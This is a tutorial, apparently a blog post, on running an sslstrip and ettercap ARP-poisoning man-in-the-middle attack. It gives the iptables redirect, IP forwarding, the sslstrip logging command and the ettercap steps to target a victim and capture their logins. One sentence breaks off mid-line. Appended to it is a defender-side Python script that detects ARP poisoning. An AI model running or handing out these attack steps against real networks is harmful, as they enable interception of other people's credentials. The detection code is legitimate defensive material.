<a href="http://timashley.me/node/368">http://timashley.me/node/368</a>
This tool provides a demonstration of the HTTPS stripping attacks that were presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.
In this article I will walk you through installing SSLstrip along with ettercap and performing a MITM attack.
1) Download Ettercap with GTK
sudo apt-get install ettercap ettercap-gtk
2) Download sslstrip
3) Extract sslstrip
tar zxvf sslstrip-0.7.tar.gz
4) Redirect requests on port 80 (HTTP) to sslstrip running on port 10000
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
5) Verify the entry in nat table
sudo iptables --list -t nat
6) Enable forwarding
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
7) Check forwarding
sudo cat /proc/sys/net/ipv4/ip_forward
You should get 1 as a reply.
8) Run sslstrip logging on port 10000
sudo python sslstrip-0.7/sslstrip.py -w sslstrip.log -l 10000
9) Monitor the log
sudo tail -F sslstrip.log
10) Launch ettercap GUI with packet dump
sudo ettercap -G -w ~/ettercap_packets.pcap
11) Enter Unified sniffing
Sniff -> Unified sniffing
12) Select your wireless interface (this may be different than mine, check yours via 'ifconfig')
Network interface: wlan0
13) Scan for hosts
Hosts -> Scan for hosts
14) View hosts list from scan
Hosts -> Host list
15) Select targets
Highlight the victim -> Add to Target 1
Highlight the access point -> Add to Target 2
16) View added targets
Targets -> Current Targets
17) Perform arp poisoning (MITM Attack) on targets
Mitm -> Arp poisoning
After the victim logs in, you will see the output in your sslstrip.log. Don't forget to go back with
Enjoy!
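
A defender-side check for the ARP poisoning in step 17, as an added example that is not part of the original article: it parses `ip neigh show` output taken on the victim host and flags a gateway whose MAC differs from a pinned value or is shared with another IPv4 address. The sample table, all addresses, and the function names are constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed `ip neigh show` output from a victim host while its ARP cache
# is poisoned: gateway 192.168.1.1 resolves to the same MAC as 192.168.1.66.
SAMPLE_NEIGH = """\
192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:66 REACHABLE
192.168.1.66 dev wlan0 lladdr 00:11:22:33:44:66 STALE
192.168.1.20 dev wlan0 lladdr 00:11:22:33:44:20 REACHABLE
192.168.1.30 dev wlan0  FAILED
fe80::1 dev wlan0 lladdr 00:11:22:33:44:66 router STALE
"""

ENTRY_RE = re.compile(r"^(\S+) dev (\S+)\s+lladdr ([0-9A-Fa-f:]{17})(?:\s|$)")


def parse_neigh(text):
    """Yield (ip, dev, mac) for IPv4 entries that carry a link-layer address."""
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if not m:  # FAILED/INCOMPLETE entries have no lladdr
            continue
        ip, dev, mac = m.group(1), m.group(2), m.group(3).lower()
        # IPv4 only: a host's IPv6 addresses legitimately share its MAC.
        if ipaddress.ip_address(ip).version == 4:
            yield ip, dev, mac


def find_arp_anomalies(text, gateway_ip, pinned_gateway_mac=None):
    """Return findings that suggest the gateway's ARP entry was spoofed."""
    findings = []
    ips_by_mac = defaultdict(set)
    for ip, dev, mac in parse_neigh(text):
        ips_by_mac[(dev, mac)].add(ip)
        if ip == gateway_ip and pinned_gateway_mac \
                and mac != pinned_gateway_mac.lower():
            findings.append(("gateway_mac_mismatch", ip, mac))
    for (dev, mac), ips in sorted(ips_by_mac.items()):
        # Only report sharing that involves the gateway; other duplicates
        # (multi-address hosts, proxy ARP) are common and benign.
        if gateway_ip in ips and len(ips) > 1:
            findings.append(("gateway_mac_shared", mac, sorted(ips)))
    return findings


if __name__ == "__main__":
    for finding in find_arp_anomalies(SAMPLE_NEIGH, "192.168.1.1",
                                      pinned_gateway_mac="00:11:22:33:44:01"):
        print(finding)
```

The pinned gateway MAC has to be recorded while the network is known to be clean; without it only the shared-MAC finding is available.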